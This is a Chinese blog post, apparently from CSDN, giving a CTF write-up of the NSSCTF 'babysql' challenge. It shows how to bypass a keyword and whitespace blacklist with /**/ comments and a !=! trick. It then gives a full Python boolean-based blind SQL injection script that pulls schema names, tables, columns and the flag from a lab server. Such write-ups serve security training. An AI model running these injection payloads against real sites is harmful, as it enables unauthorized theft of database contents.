[NSSCTF 2022 Spring Recruit]babysql

最新推荐文章于 2024-04-29 17:13:56 发布
最新推荐文章于 2024-04-29 17:13:56 发布
阅读量1k 收藏 5
点赞数 34
分类专栏: ctf 文章标签: spring 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l181954187/article/details/137886266
版权

看到这个感觉是sql注入,根据他的提示,输入tarnish试试

然后测试一下,发现黑名单:hacker!!black_list is /if|and|\s|#|--/i

把注释符号都过滤了,可以使用闭合的方法构造注入,空格使用/**/绕过

我用同或(!=!)来构造注入

同或 !=! 的逻辑:1 !=! 1 == 11 !=! 0 == 00 !=! 1 == 00 !=! 0 == 1

mysql> select 1 !=! 0 !=! 1;

+---------------+

| 1 !=! 0 !=! 1 |

+---------------+

|             0 |

+---------------+

1 row in set (0.01 sec)

构造 tarnish'!=!(1)!=!'1  (True !=! True !=! True) == True

后面试了半天,不行,直接用二分法

import requests

asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'

burp0_url = "http://1.14.71.254:28758/"

burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0", 

                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 

                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 

                 "Accept-Encoding": "gzip, deflate", 

                 "Content-Type": "application/x-www-form-urlencoded"

                 }

content = ''

for pos in range(1, 100):

    min_num = 32

    max_num = 126

    mid_num = (min_num + max_num) // 2

    while(min_num < max_num):

        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))>{})/**/!=!/**/'1".format(pos, mid_num)

        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),{},1))>{})/**/!=!/**/'1".format(pos, mid_num)

        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})/**/!=!/**/'1".format(pos, mid_num)

        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))>{})/**/!=!/**/'1".format(pos, mid_num)

        burp0_data = {"username": payload}

        resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)

        if 'string(39)' in resp.text:

            min_num = mid_num + 1

        else:

            max_num = mid_num

        mid_num = (min_num + max_num) // 2

    content += chr(min_num)

print(content)

成功爆出flag

leoleo!
关注
  • 34
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
recruit
03-22
recruit
记一次[NSSCTF 2022 Spring Recruit]babyphp
dangwobucunzai的博客
03-10 407
第三个if,这里要求b1!=b2,但是又要求md5值相同,在这里也同样是用到了数组绕过,如果md5() 中传入的不是字符串而是数组,不但md5()函数不会报错,结果还会返回null,在强比较(===)里面null=null为true绕过,b1与b2设置不同的值即可,此处传参 b1[]=1&b2[]=2 即可绕过。$a和$b都传入md5()后,得到值为0e开头的数据,会将其识别为科学计数法,结果都为零。通过观察代码,可发现需要通过四个if判断才能拿到我们的flag。这里我使用的是数组绕过,传参 a[]=1。
[NSSCTF 2022 Spring Recruit] Crypto wp
bestkasscn的博客
03-22 2139
[NSSCTF 2022 Spring Recruit] Crypto wp classic 题目 UZZJAM{UIXETGR7TMWD42SKTCWEP4AG_mhrlmshnayfihzl} 第一层是凯撒密码 NSSCTF{NBQXMZK7MFPW42LDMVPXI4TZ_fakeflagtrybase} 稍微有点英语基础就知道fakeflagtrybase是假flag,然后去试base,最后用base32解NBQXMZK7MFPW42LDMVPXI4TZ得have_a_nice_try,用NSS
NSSCTF 2022 Spring Recruit]ezgame
2302_80059204的博客
12-08 81
打开靶机之后可以看到是一个游戏,那就查看源码看看flag是不是可以直接找到,或者说可以看到获得flag的条件、而且是一个js写的小游戏并找到游戏分数累加所在的位置,那就对js文件进行修改。修改成功之后,游戏随便玩一下,便可得到flag。可以看到只要积分大于65即可获胜。第一步,建一个空文件。
[NSSCTF 2022 Spring Recruit]ezgame
m0_73612768的博客
12-26 395
flag 在 js 代码里
recruit-system
03-06
recruit-system
Recruit Management System-开源
05-10
这是一个由应用程序和数据库组成的开源软件项目。
AIFE_recruit
05-06
(AIFE_recruit)用于地球招聘预测的AI 项目介绍 要研究的问题 方法 项目大纲 数据输入 从以下数据源进一步关注数据类型和集 数据准备和初始分析 可能的ML算法在此范围内进行聚类 以前的数据可视化 测试与评分数据...
recruit招聘爬虫数据分析
08-10
1.爬虫: 采用Scrapy 分布式爬虫技术,使用mongodb作为数据存储,爬取的网站Demo为51job,数据我目前爬了有几千条 2.数据处理:采用pandas对爬取的数据进行清晰和处理 2.数据分析:采用flask后端获取mongodb数据,...
Spring AI 抢先体验,5 分钟玩转 Java AI 应用开发
最新发布
阿里巴巴云原生的博客
04-29 740
Spring Cloud Alibaba AI 以 Spring AI 为基础,并在此基础上提供阿里云通义系列大模型全面适配,让用户在 5 分钟内开发基于通义大模型的 Java AI 应用。
springboot集成-mybatis-puls
csy08845的博客
04-29 108
Spring Boot中集成MyBatis Plus是一个相对简单的过程,MyBatis Plus是一个MyBatis的增强工具,它简化了CRUD操作,并且提供了一些额外的功能,比如性能优化、自动填充等。3.配置MyBatis Plus:通常,MyBatis Plus的配置与MyBatis类似,不需要额外的配置,因为它会自动配置。6.使用Mapper:在你的Service中注入Mapper,并使用它。7.配置扫描:确保Spring Boot扫描到你的Mapper接口。
SpringBoot项目打包分离高阶操作
Record Little
04-23 730
虽然传输jar包 比较大,但是安全性、稳定性比较高,不需要关注pom.xml 添加了新的依赖、更新了版本号等等影响版本功能的操作。关注maven的特性, profiles即可满足, 根据不同的activation 状态,激活不同的build操作。每次修改一小部分代码或仅仅更新某个依赖jar包时,都需要重新进行整个项目的构建、打包、上传和部署。但是当你的项目趋于稳定,只有业务上的逻辑变更时,如果使用分离版本,可以加快迭代、更新的速度。弊端: 需要配置IDE命令,修改依赖时需要同时修改2处。
mysql-connector-java和spring-boot-starter-jdbc和mybatis-spring-boot-start
xzy的博客
04-23 1022
JDBC是使用java语言操作mysql数据库的规范,java语言必须按照这个规范写才可以操作mysql数据库。
SpringCloudAlibaba:2.1nacos
m0_63040701的博客
04-26 918
Nacos是阿里巴巴开源的服务注册中心以及配置中心Nacos=注册中心Eureka + 服务配置Config + 服务总线Bus。
Spring声明式事务(@Transactional)原理之-ProxyTransactionManagementConfiguration
良月柒
04-26 676
在传统的编程模型中,我们需要在代码中显式地编写事务管理逻辑,包括事务的开始、提交、回滚等。而在声明式事务管理模型中,我们可以通过注解或者XML配置的方式,将事务管理逻辑与业务逻辑分离开来,使得我们只需要专注于业务逻辑的实现,而不需要关心事务管理的细节。@Transactional注解就是用来实现声明式事务管理的重要工具之一。
SpringCloud Ribbon介绍
赵先森
04-26 508
Ribbon 是 Spring Cloud 技术栈中非常重要的基础框架,它为 Spring Cloud 提供了负载均衡的能力,比如 Fegin 和 OpenFegin 都是基于 Ribbon 实现的,就连 Nacos 中的负载均衡也使用了 Ribbon 框架。
每日一题:Spring 框架中都用到了哪些设计模式❓
lhcong_的博客
04-24 371
总之,Spring 框架中充分利用了许多设计模式,提供了良好的扩展性和灵活性,降低了代码的耦合度,提高了代码的可维护性。
SpringBoot JPA使用
gochenguowei的博客
04-25 984
Spring 框架提供的一个模块,用于简化与关系型数据库的交互和数据访问。它基于JPA(Java Persistence API)标准,并提供了一组易于使用的API和工具,帮助开发人员更轻松地进行数据库操作。通过Spring Data JPA,开发人员可以通过编写简洁的代码来执行常见的 CRUD 操作,同时还支持高级查询、分页、事务管理等功能。它的目标是提供一种更简单、更高效的方式来处理数据库操作,减少开发人员的工作量,并提高应用程序的可维护性和可扩展性。
ModuleNotFoundError: No module named recruit
12-27
根据提供的引用内容,报错信息"ModuleNotFoundError: No module named recruit"表示在运行过程中找不到名为"recruit"的模块。这可能是因为你没有安装或导入该模块。 要解决这个问题,你可以按照以下步骤进行操作: 1. 确保你已经正确安装了"recruit"模块。你可以使用以下命令来安装该模块: ```shell pip install recruit ``` 2. 如果你已经安装了"recruit"模块,但仍然出现该错误,那么可能是因为你没有正确导入该模块。请确保在你的代码中包含了正确的导入语句,例如: ```python import recruit ``` 请注意,如果你使用的是PySpark,并且在Windows上遇到了该问题,那么可能是因为你使用的PySpark版本太高,其中的"resource"模块在Windows上不可用。你可以尝试退回到较低版本的PySpark(如2.3.2)来解决该问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

leoleo!

您的慷慨将激励我创作更多内容

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值